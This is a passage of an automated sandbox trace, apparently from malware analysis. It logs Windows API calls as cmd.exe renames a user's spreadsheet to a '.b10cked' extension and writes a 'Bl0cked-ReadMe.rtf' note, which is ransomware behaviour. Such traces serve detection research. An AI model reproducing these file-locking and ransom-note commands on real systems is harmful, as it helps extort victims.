"c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.237] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef724 | out: lpFindFileData=0x2ef724) returned 0x100028 [0140.237] FindClose (in: hFindFile=0x100028 | out: hFindFile=0x100028) returned 1 [0140.238] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef724 | out: lpFindFileData=0x2ef724) returned 0x100028 [0140.238] FindClose (in: hFindFile=0x100028 | out: hFindFile=0x100028) returned 1 [0140.238] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef724 | out: lpFindFileData=0x2ef724) returned 0x100028 [0140.238] FindClose (in: hFindFile=0x100028 | out: hFindFile=0x100028) returned 1 [0140.238] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.238] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.238] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.238] GetEnvironmentStringsW () returned 0x102b08* [0140.238] FreeEnvironmentStringsW (penv=0x102b08) returned 1 [0140.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.239] GetConsoleOutputCP () returned 0x1b5 [0140.239] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.239] GetUserDefaultLCID () returned 0x409 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efae8, cchData=128 | out: lpLCData="0") returned 2 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efae8, cchData=128 | out: lpLCData="0") returned 2 [0140.239] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efae8, cchData=128 | out: lpLCData="1") returned 2 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.240] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.240] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.241] GetConsoleTitleW (in: lpConsoleTitle=0xf08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.241] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.241] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.241] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.242] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.242] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.242] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.242] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.242] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.242] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.242] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.246] GetConsoleTitleW (in: lpConsoleTitle=0x2ef7e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.246] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.246] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.246] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.246] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.246] _wcsicmp 
(_String1="move", _String2="COPY") returned 10 [0140.246] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.246] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.246] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.246] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.246] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.246] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.246] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.246] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.246] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.246] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.246] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.246] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.246] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.247] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.247] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.247] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.247] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.247] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.247] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.247] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.247] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.247] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.247] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.247] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.247] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.247] _wcsicmp (_String1="move", _String2="KEYS") returned 2 
[0140.247] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.249] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.249] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef59c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef594, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef594*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.249] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.249] _wcsnicmp (_String1="COPYCMD", 
_String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.250] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.250] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.250] _wcsicmp (_String1="IJFQBH~1.ODS", _String2=".") returned 59 [0140.250] _wcsicmp (_String1="IJFQBH~1.ODS", _String2="..") returned 59 [0140.251] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbh~1.ods")) returned 0x20 [0140.251] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x101e68 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.251] SetErrorMode (uMode=0x0) returned 0x0 [0140.251] SetErrorMode (uMode=0x1) returned 0x0 [0140.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", nBufferLength=0x104, lpBuffer=0x2eef24, lpFilePart=0x2eef0c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", lpFilePart=0x2eef0c*="IJFQBH~1.ODS") returned 0x2d [0140.251] SetErrorMode (uMode=0x0) returned 0x1 [0140.251] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x12 [0140.251] _wcsicmp (_String1="IJFQBH~1.ODS", _String2=".") returned 59 [0140.251] _wcsicmp (_String1="IJFQBH~1.ODS", _String2="..") returned 59 [0140.251] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbh~1.ods")) returned 0x20 [0140.251] SetErrorMode (uMode=0x0) returned 0x0 [0140.251] SetErrorMode (uMode=0x1) returned 0x0 [0140.251] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", nBufferLength=0x104, lpBuffer=0x2ef3a0, lpFilePart=0x2ef138 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", lpFilePart=0x2ef138*="IJFQBH~1.ODS") returned 0x2d [0140.252] SetErrorMode (uMode=0x0) returned 0x1 [0140.252] SetErrorMode (uMode=0x0) returned 0x0 [0140.252] SetErrorMode (uMode=0x1) returned 0x0 [0140.252] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2ef5a8, lpFilePart=0x2ef138 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", lpFilePart=0x2ef138*="IJFqBHm_BK63v.ods.b10cked") returned 0x3a [0140.252] SetErrorMode (uMode=0x0) returned 0x1 [0140.252] SetLastError (dwErrCode=0x0) [0140.252] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked" 
(normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods.b10cked")) returned 0xffffffff [0140.252] GetLastError () returned 0x2 [0140.252] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x2eeab4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeab4) returned 0xf0eb0 [0140.252] FindNextFileW (in: hFindFile=0xf0eb0, lpFindFileData=0x2eeab4 | out: lpFindFileData=0x2eeab4) returned 0 [0140.253] GetLastError () returned 0x12 [0140.253] FindClose (in: hFindFile=0xf0eb0 | out: hFindFile=0xf0eb0) returned 1 [0140.869] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS", fInfoLevelId=0x1, lpFindFileData=0x101c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x101c08) returned 0xf0eb0 [0140.869] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", nBufferLength=0x104, lpBuffer=0x2eed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked", lpFilePart=0x0) returned 0x3a [0140.869] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods", nBufferLength=0x104, lpBuffer=0x2eed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods", lpFilePart=0x0) returned 0x32 [0140.869] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods")) returned 0x20 [0140.869] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ijfqbhm_bk63v.ods.b10cked"), dwFlags=0x3) returned 1 [0140.870] FindClose (in: 
hFindFile=0xf0eb0 | out: hFindFile=0xf0eb0) returned 1 [0140.870] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eed00 | out: _Buffer=" 1") returned 9 [0140.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.870] GetFileType (hFile=0x7) returned 0x2 [0140.870] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.870] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eec8c | out: lpMode=0x2eec8c) returned 1 [0140.870] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.870] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eecc0 | out: lpConsoleScreenBufferInfo=0x2eecc0) returned 1 [0140.870] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0140.871] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eed00 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0140.871] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eece4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eece4*=0x1a) returned 1 [0140.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.871] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.871] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.871] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.871] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.871] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.871] SetConsoleInputExeNameW () returned 0x1 [0140.871] GetConsoleOutputCP () returned 0x1b5 [0140.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.872] SetThreadUILanguage (LangId=0x0) returned 
0x409 [0140.872] exit (_Code=0) Process: id = "159" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14626 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14627 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14628 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14629 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14630 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14631 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14632 start_va = 
0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14633 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14634 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14635 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15594 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15595 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15596 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15597 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 15598 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 15599 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15600 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15601 start_va = 
0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15602 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15603 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15604 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15605 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15606 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15607 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15608 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15609 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15610 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" 
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15611 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15612 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15613 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15614 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15615 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 15616 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 15617 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 216 os_tid = 0x664 [0140.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7e4 | out: lpSystemTimeAsFileTime=0x28f7e4*(dwLowDateTime=0x8d8b8240, dwHighDateTime=0x1d440a9)) [0140.276] GetCurrentProcessId () returned 0xde8 [0140.276] GetCurrentThreadId () returned 0x664 [0140.276] GetTickCount () returned 0x2c0de [0140.276] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7dc | out: lpPerformanceCount=0x28f7dc*=19706489085) returned 1 [0140.276] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.276] __set_app_type (_Type=0x1) [0140.276] __p__fmode () returned 0x76b331f4 [0140.276] __p__commode () returned 0x76b331fc [0140.277] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.277] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.277] GetCurrentThreadId () returned 0x664 [0140.277] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x664) returned 0x38 [0140.277] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.277] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.277] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.277] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.277] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f774 | out: phkResult=0x28f774*=0x0) returned 0x2 [0140.277] VirtualQuery (in: lpAddress=0x28f7ab, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.277] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.277] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.278] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f744, dwLength=0x1c | out: lpBuffer=0x28f744*(BaseAddress=0x193000, 